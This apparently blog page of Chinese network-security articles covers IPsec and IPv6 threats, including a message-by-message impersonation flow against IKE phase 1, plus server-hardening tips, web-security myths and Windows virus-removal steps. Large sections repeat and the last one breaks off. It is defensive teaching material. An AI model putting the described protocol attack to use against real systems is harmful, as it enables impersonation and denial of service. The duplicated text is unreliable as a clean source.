网络层安全服务与攻击分析
[ 2007-03-25 03:51:11 | 作者: sun ]
在网络层实现安全服务有很多的优点。首先,由于多种传送协议和应用程序可以共享由网络层提供的密钥管理架构,密钥协商的开销被大大地削减了。其次,若安全服务在较低层实现,那么需要改动的程序就要少很多。但是在这样的情况下仍会有新的安全问题。本文将对此作出阐述。
目前公认的网络攻击三种原型是窃听 、篡改、伪造、拒绝服务攻击等。
IPSec 针对攻击原型的安全措施
IPsec提供三项主要的功能:认证功能(AH),认证和机密组合功能(ESP)及密钥交换功能。AH的目的是提供无连接完整性和真实性包括数据源认证和可选的抗重传服务;ESP分为两部分,其中ESP头提供数据机密性和有限抗流量分析服务,在ESP尾中可选地提供无连接完整性、数据源认证和抗重传服务。
IPSec提供了一种标准的、健壮的以及包容广泛的机制,可用它为IP及上层协议(如UDP和TCP)提供安全保证。它定义了一套默认的、强制实施的算法,以确保不同的实施方案相互间可以共通。而且很方便扩展。IPSec可保障主机之间、安全网关(如路由器或防火墙)之间或主机与安全网关之间的数据包的安全。IPSec是一个工业标准网络安全协议,为IP网络通信提供透明的安全服务,保护TCP/IP通信免遭窃听和篡改,可以有效抵御网络攻击,同时保持易用性。IPSec有两个基本目标:保护IP数据包安全;为抵御网络攻击提供防护措施。IPSec结合密码保护服务、安全协议组和动态密钥管理,三者共同实现上述两个目标,IPSec基于一种端对端的安全模式。这种模式有一个基本前提假设,就是假定数据通信的传输媒介是不安全的,因此通信数据必须经过加密,而掌握加解密方法的只有数据流的发送端和接收端,两者各自负责相应的数据加解密处理,而网络中其他只负责转发数据的路由器或主机无须支持IPSec。
IPSec提供三种不同的形式来保护通过公有或私有IP网络来传送的私有数据。
(1)验证:通过认证可以确定所接受的数据与所发送的数据是一致的,同时可以确定申请发送者在实际上是真实发送者,而不是伪装的。
(2)数据完整验证:通过验证保证数据从原发地到目的地的传送过程中没有任何不可检测的数据丢失与改变。
(3)保密:使相应的接收者能获取发送的真正内容,而无关的接收者无法获知数据的真正内容。
IPv6下对网络安全的威胁
针对密码攻击的分析
基于密码的攻击很具有生命力,在IPv6环境下同样面临着这样的威胁。虽然在网络IPv6下IPsec是强制实施的,但是在这种情况下,用户使用的操作系统与其他访问控制的共同之处就是基于密码进行访问控制。对计算机与网络资源的访问都是由用户名与密码决定的。对那些版本较老的操作系统,有些组件不是在通过网络传输标识信息进行验证时就对该信息加以保护,这样窃听者能够获取有效的用户名与密码,就拥有了与实际用户同样的权限。攻击者就可以进入到机器内部进行恶意破坏。
针对泄漏密钥攻击的分析
IPv6下IPsec工作的两种模式(传输模式和隧道模式)都需要密钥交换这样的过程,因此对密钥的攻击仍然具有威胁。尽管对于攻击者来说确定密钥是一件艰难而消耗资源的过程,但是这种可能性实实在在存在。当攻击者确定密钥之后,攻击者使用泄露密钥便可获取对于安全通信的访问权,而发送者或接收者却全然没有察觉攻击,后面所进行的数据传输等等遭到没有抵抗的攻击。进而,攻击者使用泄露密钥即可解密或修改其他需要的数据。同样攻击者还会试图使用泄露密钥计算其它密钥,从而使其获取对其它安全通信的访问权。
针对应用层服务攻击
应用程序层攻击的目标是应用程序服务器,即导致服务器的操作系统或应用程序出错。这会使攻击者有能力绕过正常访问控制。攻击者利用这一点便可控制应用程序、系统或网络,并可进行下列任意操作:读取、添加、删除或修改数据或操作系统 ;引入病毒,即使用计算机与软件应用程序将病毒复制到整个网络;引入窃探器来分析网络与获取信息,并最终使用这些信息导致网络停止响应或崩溃;异常关闭数据应用程序或操作系统;禁用其它安全控制以备日后攻击。
由于IPsec在网络层进行数据包加密,在网络传输过程中防火墙无法有效地将加密的带有病毒的数据包进行有效的监测,这样就对接收端的主机或路由器构成了威胁。
可能发生的拒绝服务攻击
密钥管理分为手工密钥管理和自动密钥管理。Internet密钥管理协议被定位在应用程序的层次,IETF规定了Internet安全协议和密钥管理协议ISAKMP(Internet Security Association and Key Management Protocol) 来实现IPSec的密钥管理需求, 为身份验证的SA 设置以及密钥交换技术定义了一个通用的结构, 可以使用不同的密钥交换技术;IETF还设计了OA KL EY密钥确定协议(Key Determination Protocol) 来实施ISAKMP的具体功能, 其主要目的是使需要保密通信的双方能够通过这个协议证明自己的身份、认证对方的身份、确定采用的加密算法和通信密钥, 从而建立起安全的通信连接。
对IPsec最主要的难应用性在于它们所强化的系统的复杂性和缺乏清晰性。IPsec中包含太多的选项和太多的灵活性。对于相同的或者类似的情况常常有多种做法。
IKE的协议容易受到拒绝服务攻击。攻击者可以在因特网初始化许多连接请求就可以做到,这时服务器将会维护这些恶意的“小甜饼”。
加密是有代价的。进行模数乘幂运算,或计算两个非常大的质数的乘积,甚至对单个数据包进行解密和完整性查验,都会占用cpu的时间。发起攻击的代价远远小于被攻击对象响应这种攻击所付出的代价。例如,甲想进行一次Diffie-Hellman密钥交换,但mallory向她发送了几千个虚假的Diffie-Hellman公共值,其中全部填充伪造的返回地址。这样乙被动地进入这种虚假的交换。显然会造成cpu的大量浪费。
IPsec对相应的攻击提出了相应的对策。但它并不是通过抵挡服务否认攻击来进行主动防御,只是增大了发送这种垃圾包的代价及复杂度,来进行一种被动防御。
但是攻击者仍然可以利用IKE协议的漏洞从而使服务中断。
以下是基于签名的IKE阶段1主模式的认证失败(如图4所示)。
(Malice 对I使用他的真实身份信息,而对R则冒充I)
1. I到Malice:HDRI,SAI;
1’Malice(“I”)到R:HDRI,SAI;
2’R到Malice(“I”):HDRR,SAR;
2.Malice到I:HDRR,SAR;
3.I到Malice:HDRI,gx,NI;
3’Malice(“I”)到R:HDRI,gx,NI;
4’R到Malice(“I”):HDRR,gy,NR;
4.Malice到I:HDRR,gy,NR;
5.I到Malice:HDRI,{IDI,CertI,SigI}gxy?;
5’Malice(“I”)到R:HDRI,{IDI,CertI,SigI}gxy;
6’R到Malice(“I”):HDRR,{IDR,CertR,SigR}gxy;
6. Dropped。
这样,R认为刚才和他对话并和他共享会话密钥的是I,而I却认为刚才是和Malice进行了一次不成功的通信。R根本不会被通知存在任何异常,并且也许会拒绝来自I的服务;实际上R进入了这样一种状态,只接受来自I的服务请求(也许直到“超时”后,R才会脱离这样的状态。)
面对越来越多的网络安全问题,唯有各种安全协议有效地结合起来使用才会降低攻击的可能性。由于IPsec是IPv6下强制使用的,加上网络层加密的特殊优点,把工作于IP层的IPsec和其他的安全协议(SSL等)结合起来可以将网络安全的质量提高到更高的一个水平。但是同时道高一尺,魔高一丈,新的安全问题会接踵而至,对于协议的漏洞,要先知先觉,这样才会未雨绸缪,防患于未然。
目前公认的网络攻击三种原型是窃听 、篡改、伪造、拒绝服务攻击等。
IPSec 针对攻击原型的安全措施
IPsec提供三项主要的功能:认证功能(AH),认证和机密组合功能(ESP)及密钥交换功能。AH的目的是提供无连接完整性和真实性包括数据源认证和可选的抗重传服务;ESP分为两部分,其中ESP头提供数据机密性和有限抗流量分析服务,在ESP尾中可选地提供无连接完整性、数据源认证和抗重传服务。
IPSec提供了一种标准的、健壮的以及包容广泛的机制,可用它为IP及上层协议(如UDP和TCP)提供安全保证。它定义了一套默认的、强制实施的算法,以确保不同的实施方案相互间可以共通。而且很方便扩展。IPSec可保障主机之间、安全网关(如路由器或防火墙)之间或主机与安全网关之间的数据包的安全。IPSec是一个工业标准网络安全协议,为IP网络通信提供透明的安全服务,保护TCP/IP通信免遭窃听和篡改,可以有效抵御网络攻击,同时保持易用性。IPSec有两个基本目标:保护IP数据包安全;为抵御网络攻击提供防护措施。IPSec结合密码保护服务、安全协议组和动态密钥管理,三者共同实现上述两个目标,IPSec基于一种端对端的安全模式。这种模式有一个基本前提假设,就是假定数据通信的传输媒介是不安全的,因此通信数据必须经过加密,而掌握加解密方法的只有数据流的发送端和接收端,两者各自负责相应的数据加解密处理,而网络中其他只负责转发数据的路由器或主机无须支持IPSec。
IPSec提供三种不同的形式来保护通过公有或私有IP网络来传送的私有数据。
(1)验证:通过认证可以确定所接受的数据与所发送的数据是一致的,同时可以确定申请发送者在实际上是真实发送者,而不是伪装的。
(2)数据完整验证:通过验证保证数据从原发地到目的地的传送过程中没有任何不可检测的数据丢失与改变。
(3)保密:使相应的接收者能获取发送的真正内容,而无关的接收者无法获知数据的真正内容。
IPv6下对网络安全的威胁
针对密码攻击的分析
基于密码的攻击很具有生命力,在IPv6环境下同样面临着这样的威胁。虽然在网络IPv6下IPsec是强制实施的,但是在这种情况下,用户使用的操作系统与其他访问控制的共同之处就是基于密码进行访问控制。对计算机与网络资源的访问都是由用户名与密码决定的。对那些版本较老的操作系统,有些组件不是在通过网络传输标识信息进行验证时就对该信息加以保护,这样窃听者能够获取有效的用户名与密码,就拥有了与实际用户同样的权限。攻击者就可以进入到机器内部进行恶意破坏。
针对泄漏密钥攻击的分析
IPv6下IPsec工作的两种模式(传输模式和隧道模式)都需要密钥交换这样的过程,因此对密钥的攻击仍然具有威胁。尽管对于攻击者来说确定密钥是一件艰难而消耗资源的过程,但是这种可能性实实在在存在。当攻击者确定密钥之后,攻击者使用泄露密钥便可获取对于安全通信的访问权,而发送者或接收者却全然没有察觉攻击,后面所进行的数据传输等等遭到没有抵抗的攻击。进而,攻击者使用泄露密钥即可解密或修改其他需要的数据。同样攻击者还会试图使用泄露密钥计算其它密钥,从而使其获取对其它安全通信的访问权。
针对应用层服务攻击
应用程序层攻击的目标是应用程序服务器,即导致服务器的操作系统或应用程序出错。这会使攻击者有能力绕过正常访问控制。攻击者利用这一点便可控制应用程序、系统或网络,并可进行下列任意操作:读取、添加、删除或修改数据或操作系统 ;引入病毒,即使用计算机与软件应用程序将病毒复制到整个网络;引入窃探器来分析网络与获取信息,并最终使用这些信息导致网络停止响应或崩溃;异常关闭数据应用程序或操作系统;禁用其它安全控制以备日后攻击。
由于IPsec在网络层进行数据包加密,在网络传输过程中防火墙无法有效地将加密的带有病毒的数据包进行有效的监测,这样就对接收端的主机或路由器构成了威胁。
可能发生的拒绝服务攻击
密钥管理分为手工密钥管理和自动密钥管理。Internet密钥管理协议被定位在应用程序的层次,IETF规定了Internet安全协议和密钥管理协议ISAKMP(Internet Security Association and Key Management Protocol) 来实现IPSec的密钥管理需求, 为身份验证的SA 设置以及密钥交换技术定义了一个通用的结构, 可以使用不同的密钥交换技术;IETF还设计了OA KL EY密钥确定协议(Key Determination Protocol) 来实施ISAKMP的具体功能, 其主要目的是使需要保密通信的双方能够通过这个协议证明自己的身份、认证对方的身份、确定采用的加密算法和通信密钥, 从而建立起安全的通信连接。
对IPsec最主要的难应用性在于它们所强化的系统的复杂性和缺乏清晰性。IPsec中包含太多的选项和太多的灵活性。对于相同的或者类似的情况常常有多种做法。
IKE的协议容易受到拒绝服务攻击。攻击者可以在因特网初始化许多连接请求就可以做到,这时服务器将会维护这些恶意的“小甜饼”。
加密是有代价的。进行模数乘幂运算,或计算两个非常大的质数的乘积,甚至对单个数据包进行解密和完整性查验,都会占用cpu的时间。发起攻击的代价远远小于被攻击对象响应这种攻击所付出的代价。例如,甲想进行一次Diffie-Hellman密钥交换,但mallory向她发送了几千个虚假的Diffie-Hellman公共值,其中全部填充伪造的返回地址。这样乙被动地进入这种虚假的交换。显然会造成cpu的大量浪费。
IPsec对相应的攻击提出了相应的对策。但它并不是通过抵挡服务否认攻击来进行主动防御,只是增大了发送这种垃圾包的代价及复杂度,来进行一种被动防御。
但是攻击者仍然可以利用IKE协议的漏洞从而使服务中断。
以下是基于签名的IKE阶段1主模式的认证失败(如图4所示)。
(Malice 对I使用他的真实身份信息,而对R则冒充I)
1. I到Malice:HDRI,SAI;
1’Malice(“I”)到R:HDRI,SAI;
2’R到Malice(“I”):HDRR,SAR;
2.Malice到I:HDRR,SAR;
3.I到Malice:HDRI,gx,NI;
3’Malice(“I”)到R:HDRI,gx,NI;
4’R到Malice(“I”):HDRR,gy,NR;
4.Malice到I:HDRR,gy,NR;
5.I到Malice:HDRI,{IDI,CertI,SigI}gxy?;
5’Malice(“I”)到R:HDRI,{IDI,CertI,SigI}gxy;
6’R到Malice(“I”):HDRR,{IDR,CertR,SigR}gxy;
6. Dropped。
这样,R认为刚才和他对话并和他共享会话密钥的是I,而I却认为刚才是和Malice进行了一次不成功的通信。R根本不会被通知存在任何异常,并且也许会拒绝来自I的服务;实际上R进入了这样一种状态,只接受来自I的服务请求(也许直到“超时”后,R才会脱离这样的状态。)
面对越来越多的网络安全问题,唯有各种安全协议有效地结合起来使用才会降低攻击的可能性。由于IPsec是IPv6下强制使用的,加上网络层加密的特殊优点,把工作于IP层的IPsec和其他的安全协议(SSL等)结合起来可以将网络安全的质量提高到更高的一个水平。但是同时道高一尺,魔高一丈,新的安全问题会接踵而至,对于协议的漏洞,要先知先觉,这样才会未雨绸缪,防患于未然。
网络高手眼中的网络安全 日常防护尤为必要
[ 2007-03-25 03:50:59 | 作者: sun ]
近期读了一些关于网络入侵的文章,感觉到增强网络安全是一项日常性的工作,并不是说网络设备、服务器配置好了就绝对安全了,操作系统和一些软件的漏洞是不断被发现的,比如冲击波、震荡波病毒就是利用系统漏洞,同样利用这些漏洞可以溢出得到系统管理员权限, server-U的提升权限漏洞也可以被利用。在这些漏洞未被发现前,我们觉得系统是安全的,其实还是不安全的,也许漏洞在未公布前已经被部分hacker 所知,也就是说系统和应用软件我们不知道还会存在什么漏洞,那么日常性的防护就显得尤为必要。
一、做好基础性的防护工作,服务器安装干净的操作系统,不需要的服务一律不装,多一项就多一种被入侵的可能性,打齐所有补丁,微软的操作系统当然推荐WIN2K3,性能和安全性比WIN2K都有所增强,选择一款优秀的杀毒软件,至少能对付大多数木马和病毒 的,安装好杀毒软件,设置好时间段自动上网升级,设置好帐号和权限,设置的用户尽可能的少,对用户的权限尽可能的小,密码设置要足够强壮。对于MSSQL,也要设置分配好权限,按照最小原则分配。最好禁用xp_cmdshell。有的网络有硬件防火墙,当 然好,但仅仅依靠硬件防火墙,并不能阻挡hacker的攻击,利用反向连接型的木马和其他的办法还是可以突破硬件防火墙的阻挡。WIN2K3系统自带的防火墙功能还不够强大,建议打开,但还需要安装一款优秀的软件防火墙保护系统,我一般习惯用ZA,论坛有 很多教程了。对于对互联网提供服务的服务器,软件防火墙的安全级别设置为最高,然后仅仅开放提供服务的端口,其他一律关闭,对于服务器上所有要访问网络的程序,现在防火墙都会给予提示是否允许访问,根据情况对于系统升级,杀毒软件自动升级等有必要访问外网 的程序加到防火墙允许访问列表。那么那些反向连接型的木马就会被防火墙阻止,这样至少系统多了一些安全性的保障,给hacker入侵就多一些阻碍。网络上有很多基础型的防护资料,大家可以查查相关服务器安全配置方面的资料。
二、修补所有已知的漏洞,未知的就没法修补了,所以要养成良好的习惯,就是要经常去关注。了解自己的系统,知彼知己,百战百胜。所有补丁是否打齐,比如mssql,server-U,论坛程序是否还有漏洞,每一个漏洞几乎都是致命的,系统开了哪些服务,开了哪些端口,目前开的这些服务中有没有漏洞可以被黑客应用,经常性的了解当前黑客攻击的手法和可以被利用的漏洞,检查自己的系统中是否存在这些漏洞。比如SQL注入漏洞,很多网站 都是因为这个服务器被入侵,如果我们作为网站或者服务器的管理者,我们就应该经常去关注这些技术,自己经常可以用一些安全性扫描工具检测检测,比如X- scan,snamp, nbsi,PHP注入检测工具等,或者是用当前比较流行的hacker入侵工具检测自己的系统是否存在漏洞,这得针对自己的系统开的服务去检测,发现漏洞及时修补。网络管理人员不可能对每一方面都很精通,可以请精通的人员帮助检测,当然对于公司来说,如果 系统非常重要,应该请专业的安全机构来检测,毕竟他们比较专业。
三、服务器的远程管理,相信很多人都喜欢用server自带的远程终端,我也喜欢,简洁速度快。但对于外网开放的服务器来说,就要谨慎了,要想到自己能用,那么这个端口就对外开放了,黑客也可以用,所以也要做一些防护了。一就是用证书策略来限制访问者,给 TS配置安全证书,客户端访问需要安全证书。二就是限制能够访问服务器终端服务的IP地址。三是可以在前两者的基础上再把默认的3389端口改一下。当然也可以用其他的远程管理软件pcanywhere也不错。
四、另外一个容易忽视的环节是网络容易被薄弱的环节所攻破,服务器配置安全了,但网络存在其他不安全的机器,还是容易被攻破,“千里之堤,溃于蚁穴 ”。利用被控制的网络中的一台机器做跳板,可以对整个网络进行渗透攻击,所以安全的配置网络中的机器也很必要。说到跳板攻击,水平稍高一点的hacker攻击一般都会隐藏其真实IP,所以说如果被入侵了,再去追查的话是很难成功的。Hacker利用控制的肉鸡,肉鸡一般都是有漏洞被完全控制的计算机,安装了一些代理程序或者黑客软件,比如DDOS攻击软件,跳板程序等,这些肉鸡就成为黑客的跳板,从而隐藏了真实IP。
五、最后想说的是即使大家经过层层防护,系统也未必就绝对安全了,但已经可以抵挡一般的hacker的攻击了。连老大微软都不能说他的系统绝对安全。系统即使只开放80端口, 如果服务方面存在漏洞的话,水平高的hacker还是可以钻进去,所以最关键的一点我认为还是关注最新漏洞,发现就要及时修补。“攻就是防,防就是攻” ,这个观点我比较赞同,我说的意思并不是要去攻击别人的网站,而是要了解别人的攻击手法,更好的做好防护。比如不知道什么叫克隆管理员账号,也许你的机器已经被入侵并被克隆了账号,可能你还不知道呢?如果知道有这种手法,也许就会更注意这方面。自己的网站 如果真的做得无漏洞可钻,hacker也就无可奈何了。
希望大家有好的思路和经验能够多探讨探讨,要做好网络安全还有很多细节需要注意,一个微小的疏忽都可能导致功亏一篑
.
一、做好基础性的防护工作,服务器安装干净的操作系统,不需要的服务一律不装,多一项就多一种被入侵的可能性,打齐所有补丁,微软的操作系统当然推荐WIN2K3,性能和安全性比WIN2K都有所增强,选择一款优秀的杀毒软件,至少能对付大多数木马和病毒 的,安装好杀毒软件,设置好时间段自动上网升级,设置好帐号和权限,设置的用户尽可能的少,对用户的权限尽可能的小,密码设置要足够强壮。对于MSSQL,也要设置分配好权限,按照最小原则分配。最好禁用xp_cmdshell。有的网络有硬件防火墙,当 然好,但仅仅依靠硬件防火墙,并不能阻挡hacker的攻击,利用反向连接型的木马和其他的办法还是可以突破硬件防火墙的阻挡。WIN2K3系统自带的防火墙功能还不够强大,建议打开,但还需要安装一款优秀的软件防火墙保护系统,我一般习惯用ZA,论坛有 很多教程了。对于对互联网提供服务的服务器,软件防火墙的安全级别设置为最高,然后仅仅开放提供服务的端口,其他一律关闭,对于服务器上所有要访问网络的程序,现在防火墙都会给予提示是否允许访问,根据情况对于系统升级,杀毒软件自动升级等有必要访问外网 的程序加到防火墙允许访问列表。那么那些反向连接型的木马就会被防火墙阻止,这样至少系统多了一些安全性的保障,给hacker入侵就多一些阻碍。网络上有很多基础型的防护资料,大家可以查查相关服务器安全配置方面的资料。
二、修补所有已知的漏洞,未知的就没法修补了,所以要养成良好的习惯,就是要经常去关注。了解自己的系统,知彼知己,百战百胜。所有补丁是否打齐,比如mssql,server-U,论坛程序是否还有漏洞,每一个漏洞几乎都是致命的,系统开了哪些服务,开了哪些端口,目前开的这些服务中有没有漏洞可以被黑客应用,经常性的了解当前黑客攻击的手法和可以被利用的漏洞,检查自己的系统中是否存在这些漏洞。比如SQL注入漏洞,很多网站 都是因为这个服务器被入侵,如果我们作为网站或者服务器的管理者,我们就应该经常去关注这些技术,自己经常可以用一些安全性扫描工具检测检测,比如X- scan,snamp, nbsi,PHP注入检测工具等,或者是用当前比较流行的hacker入侵工具检测自己的系统是否存在漏洞,这得针对自己的系统开的服务去检测,发现漏洞及时修补。网络管理人员不可能对每一方面都很精通,可以请精通的人员帮助检测,当然对于公司来说,如果 系统非常重要,应该请专业的安全机构来检测,毕竟他们比较专业。
三、服务器的远程管理,相信很多人都喜欢用server自带的远程终端,我也喜欢,简洁速度快。但对于外网开放的服务器来说,就要谨慎了,要想到自己能用,那么这个端口就对外开放了,黑客也可以用,所以也要做一些防护了。一就是用证书策略来限制访问者,给 TS配置安全证书,客户端访问需要安全证书。二就是限制能够访问服务器终端服务的IP地址。三是可以在前两者的基础上再把默认的3389端口改一下。当然也可以用其他的远程管理软件pcanywhere也不错。
四、另外一个容易忽视的环节是网络容易被薄弱的环节所攻破,服务器配置安全了,但网络存在其他不安全的机器,还是容易被攻破,“千里之堤,溃于蚁穴 ”。利用被控制的网络中的一台机器做跳板,可以对整个网络进行渗透攻击,所以安全的配置网络中的机器也很必要。说到跳板攻击,水平稍高一点的hacker攻击一般都会隐藏其真实IP,所以说如果被入侵了,再去追查的话是很难成功的。Hacker利用控制的肉鸡,肉鸡一般都是有漏洞被完全控制的计算机,安装了一些代理程序或者黑客软件,比如DDOS攻击软件,跳板程序等,这些肉鸡就成为黑客的跳板,从而隐藏了真实IP。
五、最后想说的是即使大家经过层层防护,系统也未必就绝对安全了,但已经可以抵挡一般的hacker的攻击了。连老大微软都不能说他的系统绝对安全。系统即使只开放80端口, 如果服务方面存在漏洞的话,水平高的hacker还是可以钻进去,所以最关键的一点我认为还是关注最新漏洞,发现就要及时修补。“攻就是防,防就是攻” ,这个观点我比较赞同,我说的意思并不是要去攻击别人的网站,而是要了解别人的攻击手法,更好的做好防护。比如不知道什么叫克隆管理员账号,也许你的机器已经被入侵并被克隆了账号,可能你还不知道呢?如果知道有这种手法,也许就会更注意这方面。自己的网站 如果真的做得无漏洞可钻,hacker也就无可奈何了。
希望大家有好的思路和经验能够多探讨探讨,要做好网络安全还有很多细节需要注意,一个微小的疏忽都可能导致功亏一篑
.
你的网络安全吗?需要澄清的五个误解
[ 2007-03-25 03:50:46 | 作者: sun ]
目前,黑客攻击已成为一个很严重的网络问题。许多黑客甚至可以突破SSL加密和各种防火墙,攻入Web网站的内部,窃取信息。黑客可以仅凭借浏览器和几个技巧,即套取Web网站的客户信用卡资料和其它保密信息。
随着防火墙和补丁管理已逐渐走向规范化,各类网络设施应该是比以往更完全。但不幸的是,道高一尺,魔高一丈,黑客们已开始直接在应用层面
对Web网站下手。市场研究公司Gartner的分析师指出,目前有70%的黑客袭击事件都发生在应用程序方面。要增强Web网站的安全性,首先要澄清五个误解。
一、“Web网站使用了SSL加密,所以很安全”
单靠SSL加密无法保障网站的安全。网站启用SSL加密后,表明该网站发送和接收的信息都经过了加密处理,但是SSL无法保障存储在网站里的信息的安全。许多网站采用了128位SSL加密,但还是被黑客攻破。此外,SSL也无法保护网站访问者的隐私信息。这些隐私信息直接存在网站服务器里面,这是SSL所无法保护的。
二、“Web网站使用了防火墙,所以很安全”
防火墙有访问过滤机制,但还是无法应对许多恶意行为。许多网上商店、拍卖网站和BBS都安装了防火墙,但依然脆弱。防火墙通过设置“访客名单”,可以把恶意访问排除在外,只允许善意的访问者进来。但是,如何鉴别善意访问和恶意访问是一个问题。访问一旦被允许,后续的安全问题就不是防火墙能应对了。
三、“漏洞扫描工具没发现任何问题,所以很安全”
自1990年代初以来,漏洞扫描工具已经被广泛使用,以查找一些明显的网络安全漏洞。但是,这种工具无法对网站应用程序进行检测,无法查找程序中的漏洞。
漏洞扫描工具生成一些特殊的访问请求,发送给Web网站,在获取网站的响应信息后进行分析。该工具将响应信息与一些漏洞进行对比,一旦发现可疑之处即报出安全漏洞。目前,新版本的漏洞扫描工具一般能发现网站90%以上的常见安全问题,但这种工具对网站应用程序也有很多无能为力的地方。
四、“网站应用程序的安全问题是程序员造成的”
程序员确实造成了一些问题,但有些问题程序员无法掌控。
比如说,应用程序的源代码可能最初从其它地方获得,这是公司内部程序开发人员所不能控制的。或者,公司可能会请一些离岸的开发商作一些定制开发,与原有程序整合,这其中也可能会出现问题。或者,一些程序员会拿来一些免费代码做修改,这也隐藏着安全问题。再举一个极端的例子,可能有两个程序员来共同开发一个程序项目,他们分别开发的代码都没有问题,安全性很好,但整合在一起则可能出现安全漏洞。
很现实地讲,软件总是有漏洞的,这种事每天都在发生。安全漏洞只是众多漏洞中的一种。加强员工的培训,确实可以在一定程度上改进代码的质量。但需要注意,任何人都会犯错误,漏洞无可避免。有些漏洞可能要经过许多年后才会被发现。
五、“我们每年会对Web网站进行安全评估,所以很安全”
一般而言,网站应用程序的代码变动很快。对Web网站进行一年一度的安全评估非常必要,但评估时的情况可能与当前情况有很大不同。网站应用程序只要有任何改动,都会出现安全问题的隐患。
网站喜欢选在节假日对应用程序进行升级,圣诞节就是很典型的一个旺季。网站往往会增加许多新功能,但却忽略了安全上的考虑。如果网站不增加新功能,这又会对经营业绩产生影响。网站应该在程序开发的各个阶段都安排专业的安全人员。
一、中毒的一些表现
我们怎样知道电脑中病毒了呢?其实电脑中毒跟人生病一样,总会有一些明显的症状表现出来。例如机器运行十分缓慢、上不了网、杀毒软件生不了级、word文档打不开,电脑不能正常启动、硬盘分区找不到了、数据丢失等等,就是中毒的一些征兆。
二、中毒诊断
1、按Ctrl+Shift+Ese键(同时按此三键),调出windows任务管理器查看系统运行的进程,找出不熟悉进程并记下其名称(这需要经验),如果这些进程是病毒的话,以便于后面的清除。暂时不要结束这些进程,因为有的病毒或非法的进程可能在此没法结束。点击性能查看CPU和内存的当前状态,如果CPU的利用率接近100%或内存的占用值居高不下,此时电脑中毒的可能性是95%。
2、查看windows当前启动的服务项,由“控制面板”的“管理工具”里打开“服务”。看右栏状态为“启动”启动类别为“自动”项的行;一般而言,正常的windows服务,基本上是有描述内容的(少数被骇客或蠕虫病毒伪造的除外),此时双击打开认为有问题的服务项查看其属性里的可执行文件的路径和名称,假如其名称和路径为C:winntsystem32explored.exe,计算机中招。有一种情况是“控制面板”打不开或者是所有里面的图标跑到左边,中间有一纵向的滚动条,而右边为空白,再双击添加/删除程序或管理工具,窗体内是空的,这是病毒文件winhlpp32.exe发作的特性。
3、运行注册表编辑器,命令为regedit或regedt32,查看都有那些程序与windows一起启动。主要看Hkey_Local_MachineSoftwareMicroSoftWindowsCurrentVersionRun和后面几个RunOnce等,查看窗体右侧的项值,看是否有非法的启动项。WindowsXp运行msconfig也起相同的作用。随着经验的积累,你可以轻易的判断病毒的启动项。
4、用浏览器上网判断。前一阵发作的Gaobot病毒,可以上yahoo.com,sony.com等网站,但是不能访问诸如www.symantec.com,www.ca.com这样著名的安全厂商的网站,安装了symantecNorton2004的杀毒软件不能上网升级。
5、取消隐藏属性,查看系统文件夹winnt(windows)system32,如果打开后文件夹为空,表明电脑已经中毒;打开system32后,可以对图标按类型排序,看有没有流行病毒的执行文件存在。顺便查一下文件夹Tasks,wins,drivers.目前有的病毒执行文件就藏身于此;driversetc下的文件hosts是病毒喜欢篡改的对象,它本来只有700字节左右,被篡改后就成了1Kb以上,这是造成一般网站能访问而安全厂商网站不能访问、著名杀毒软件不能升级的原因所在。
6、由杀毒软件判断是否中毒,如果中毒,杀毒软件会被病毒程序自动终止,并且手动升级失败。
三、灭毒
1、在注册表里删除随系统启动的非法程序,然后在注册表中搜索所有该键值,删除之。当成系统服务启动的病毒程序,会在Hkey_Local_MachineSystemControlSet001services和controlset002services里藏身,找到之后一并消灭。
2、停止有问题的服务,改自动为禁止。
3、如果文件system32driversetchosts被篡改,恢复它,即只剩下一行有效值“127.0.0.1localhost”,其余的行删除。再把host设置成只读。
4、重启电脑,摁F8进“带网络的安全模式”。目的是不让病毒程序启动,又可以对Windows升级打补丁和对杀毒软件升级。
5、搜索病毒的执行文件,手动消灭之。
6、对Windows升级打补丁和对杀毒软件升级。
7、关闭不必要的系统服务,如remoteregistryservice。
8、第6步完成后用杀毒软件对系统进行全面的扫描,剿灭漏网之鱼。
9、上步完成后,重启计算机,完成所有操作。
还有另一种查毒的方法:
启动好后 什也不要打开 在“开始——运行——cmd——netstat -a -n -o ”,看看有什么进程在通信 那个进程90%就是病毒或木马了
我们怎样知道电脑中病毒了呢?其实电脑中毒跟人生病一样,总会有一些明显的症状表现出来。例如机器运行十分缓慢、上不了网、杀毒软件生不了级、word文档打不开,电脑不能正常启动、硬盘分区找不到了、数据丢失等等,就是中毒的一些征兆。
二、中毒诊断
1、按Ctrl+Shift+Ese键(同时按此三键),调出windows任务管理器查看系统运行的进程,找出不熟悉进程并记下其名称(这需要经验),如果这些进程是病毒的话,以便于后面的清除。暂时不要结束这些进程,因为有的病毒或非法的进程可能在此没法结束。点击性能查看CPU和内存的当前状态,如果CPU的利用率接近100%或内存的占用值居高不下,此时电脑中毒的可能性是95%。
2、查看windows当前启动的服务项,由“控制面板”的“管理工具”里打开“服务”。看右栏状态为“启动”启动类别为“自动”项的行;一般而言,正常的windows服务,基本上是有描述内容的(少数被骇客或蠕虫病毒伪造的除外),此时双击打开认为有问题的服务项查看其属性里的可执行文件的路径和名称,假如其名称和路径为C:winntsystem32explored.exe,计算机中招。有一种情况是“控制面板”打不开或者是所有里面的图标跑到左边,中间有一纵向的滚动条,而右边为空白,再双击添加/删除程序或管理工具,窗体内是空的,这是病毒文件winhlpp32.exe发作的特性。
3、运行注册表编辑器,命令为regedit或regedt32,查看都有那些程序与windows一起启动。主要看Hkey_Local_MachineSoftwareMicroSoftWindowsCurrentVersionRun和后面几个RunOnce等,查看窗体右侧的项值,看是否有非法的启动项。WindowsXp运行msconfig也起相同的作用。随着经验的积累,你可以轻易的判断病毒的启动项。
4、用浏览器上网判断。前一阵发作的Gaobot病毒,可以上yahoo.com,sony.com等网站,但是不能访问诸如www.symantec.com,www.ca.com这样著名的安全厂商的网站,安装了symantecNorton2004的杀毒软件不能上网升级。
5、取消隐藏属性,查看系统文件夹winnt(windows)system32,如果打开后文件夹为空,表明电脑已经中毒;打开system32后,可以对图标按类型排序,看有没有流行病毒的执行文件存在。顺便查一下文件夹Tasks,wins,drivers.目前有的病毒执行文件就藏身于此;driversetc下的文件hosts是病毒喜欢篡改的对象,它本来只有700字节左右,被篡改后就成了1Kb以上,这是造成一般网站能访问而安全厂商网站不能访问、著名杀毒软件不能升级的原因所在。
6、由杀毒软件判断是否中毒,如果中毒,杀毒软件会被病毒程序自动终止,并且手动升级失败。
三、灭毒
